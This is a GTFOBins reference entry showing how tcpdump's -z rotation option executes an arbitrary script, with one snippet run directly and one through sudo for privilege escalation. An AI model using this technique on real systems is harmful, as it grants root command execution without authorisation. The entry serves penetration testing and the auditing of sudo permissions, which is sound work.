GTFOBins.github.io/_gtfobins/tcpdump.md
2018-09-07 13:33:30 +02:00

527 B

description functions
These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
execute-non-interactive sudo-enabled
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF